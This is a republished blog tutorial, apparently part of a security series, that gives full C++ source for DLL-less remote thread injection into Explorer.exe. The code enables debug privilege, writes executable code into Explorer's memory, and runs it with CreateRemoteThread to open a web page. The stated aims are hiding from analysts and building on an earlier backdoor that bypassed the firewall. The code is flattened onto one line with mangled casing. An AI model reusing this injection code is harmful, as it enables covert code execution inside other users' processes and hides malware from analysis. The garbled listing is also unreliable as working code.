Secure Path-No DLL file for remote thread injection

Source: Internet
Author: User

Brief introduction

In the previous chapters, I introduced knowledge about remote thread injection, and implemented backdoor. dll files into the Explorer.exe to bypass the firewall bounce back door. But an. exe file always takes a. dll file when it is injected it is really troublesome, then there is no way to do not apply to the. dll file implementation injection?
The answer is yes, we can directly write functions in the thread function, and then directly inject the entire function, this method compared to DLL injection will be slightly more complex, suitable for some small volume of the program to inject. But pay attention to the problem of address relocation of dynamic link library, Because normal files typically load the Kernel32.dll file by default without loading other DLLs, and only Kernel32.dll and User32.dll files can guarantee the same load address in the local and destination processes, it is best to manually use LoadLibrary and G in remote threading functions The Etprocessaddress function forces the DLL file to load again. Visual Studio recommends turning off the compiler's "/GS" option when compiling files for such features, as well as referring to this link in other areas where you need to be aware.
The following we use this method to let Windows Explorer Explorer.exe implementation of the Web page (advertising) function, and the analyst can not be found in the program depends on the dynamic link library of our injected thread DLL file, achieve a certain hidden effect.

Code implementation
filename:injectprocess.cpp//creator:peterzheng//date:2018/8/18 0:35//Comment: Inject Process without Dll file////////////////////////////////#include <cstdio> #include <cstdlib># Include <iostream> #include <string> #include <string.h> #include <windows.h> #include < strsafe.h> #include <tlhelp32.h> #define MAX_LENGTH 50#define normal_length 20#pragma Warning (disable:4996)    Using namespace std;typedef struct _remoteparam{CHAR szoperation[normal_length];    CHAR Szaddrerss[max_length];    CHAR Szlb[normal_length];    CHAR Szfunc[normal_length];    LPVOID dwmlaadress;    LPVOID dwmgpaaddress; LPVOID dwseaddress;}     Remoteparam;dword WINAPI ThreadProc (Remoteparam *lprp) {typedef hmodule (WINAPI *mloadlibrarya) (in LPCTSTR lpfilename);    typedef FARPROC (WINAPI *mgetprocaddress) (in Hmodule hmodule, in LPCSTR lpprocname); typedef hinstance (WINAPI *mshellexecutea) (HWND hwnd, LPCSTR lpoperation, LPCSTR lPFile, LPCSTR lpparameters, LPCSTR lpdirectory, INT nshowcmd);    Mloadlibrarya MLA;    Mgetprocaddress Mgpa;    Mshellexecutea MSE;    MLA = (Mloadlibrarya) lprp->dwmlaadress;    Mgpa = (mgetprocaddress) lprp->dwmgpaaddress;    Lprp->dwseaddress = (LPVOID) Mgpa (MLA (LPRP-&GT;SZLB), lprp->szfunc);    MSE = (Mshellexecutea) lprp->dwseaddress;    MSE (null, lprp->szoperation, LPRP-&GT;SZADDRERSS, NULL, NULL, SW_SHOWNORMAL); return 0;}    DWORD GetProcessID (CHAR *processname) {PROCESSENTRY32 pe32;    pe32.dwsize = sizeof (PE32);    HANDLE Hprocesssnap = createtoolhelp32snapshot (th32cs_snapprocess, 0);        if (Hprocesssnap = = Invalid_handle_value) {printf ("CreateToolhelp32Snapshot error");    return 0;    } BOOL bprocess = Process32First (Hprocesssnap, &pe32); while (bprocess) {if (strcmp (STRUPR (Pe32.szexefile), STRUPR (ProcessName)) = = 0) return Pe32.th32proc        EssID;    bprocess = Process32Next (Hprocesssnap, &pe32); } ClOsehandle (HPROCESSSNAP); return 0;}    int Enabledebugpriv (const TCHAR *name) {HANDLE htoken;    Token_privileges TP;    LUID LUID; if (! OpenProcessToken (GetCurrentProcess (), Token_adjust_privileges |        Token_query, &htoken) {printf ("OpenProcessToken error!\n");    return 1; } if (!        Lookupprivilegevalue (NULL, Name, &luid)) {printf ("Lookupprivilege error!\n");    return 1; } TP.    Privilegecount = 1; Tp. Privileges[0].    Attributes = se_privilege_enabled; Tp. Privileges[0].    Luid = Luid; if (!  AdjustTokenPrivileges (htoken, 0, &AMP;TP, sizeof (token_privileges), NULL, NULL)) {printf ("AdjustTokenPrivileges        Error!\n ");    return 1; } return 0;}    BOOL injectprocess (const DWORD dwpid) {if (Enabledebugpriv (se_debug_name)) return FALSE;    HANDLE hWnd = OpenProcess (process_all_access, FALSE, dwpid);    if (!hwnd) return FALSE;    Remoteparam RP;    ZeroMemory (&AMP;RP, sizeof (Remoteparam)); Rp.dwmlaadress = (LPVOID)    GetProcAddress (LoadLibrary ("Kernel32.dll"), "LoadLibraryA");    Rp.dwmgpaaddress = (LPVOID) GetProcAddress (LoadLibrary ("Kernel32.dll"), "GetProcAddress");    StringCchCopy (rp.szlb, sizeof (RP.SZLB), "Shell32.dll");    StringCchCopy (Rp.szfunc, sizeof (Rp.szfunc), "Shellexecutea");    StringCchCopy (Rp.szaddrerss, sizeof (RP.SZADDRERSS), "https://www.baidu.com");    StringCchCopy (rp.szoperation, sizeof (rp.szoperation), "open"); Remoteparam *premoteparam = (Remoteparam *) VirtualAllocEx (hWnd, 0, sizeof (remoteparam), Mem_commit |    Mem_reserve, Page_execute_readwrite);    if (!premoteparam) return FALSE; if (!    WriteProcessMemory (HWnd, Premoteparam, &AMP;RP, sizeof (Remoteparam), 0)) return FALSE; LPVOID Premotethread = VirtualAllocEx (hWnd, 0, 1024x768 * 4, Mem_commit |    Mem_reserve, Page_execute_readwrite);    if (!premotethread) return FALSE; if (!    WriteProcessMemory (HWnd, Premotethread, &threadproc, 1024x768 * 4, 0)) return FALSE; HANDLE hthread = CreateRemoteThread (hWnd, NULL, 0, (Lpthread_start_routine) Premotethread, (LPVOID) premoteparam, 0, NULL);    if (!hthread) return FALSE; return TRUE;}    int WINAPI WinMain (_in_ hinstance hinstance, _in_opt_ hinstance hprevinstance, _in_ LPSTR lpcmdline, _in_ int nshowcmd) {    CHAR Szprocname[max_length] = "n";    StringCchCopy (Szprocname, Max_length, "Explorer.exe");    Injectprocess (GetProcessID (szprocname));    ExitProcess (0); return 0;}

Secure Path-no DLL file for remote thread injection

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.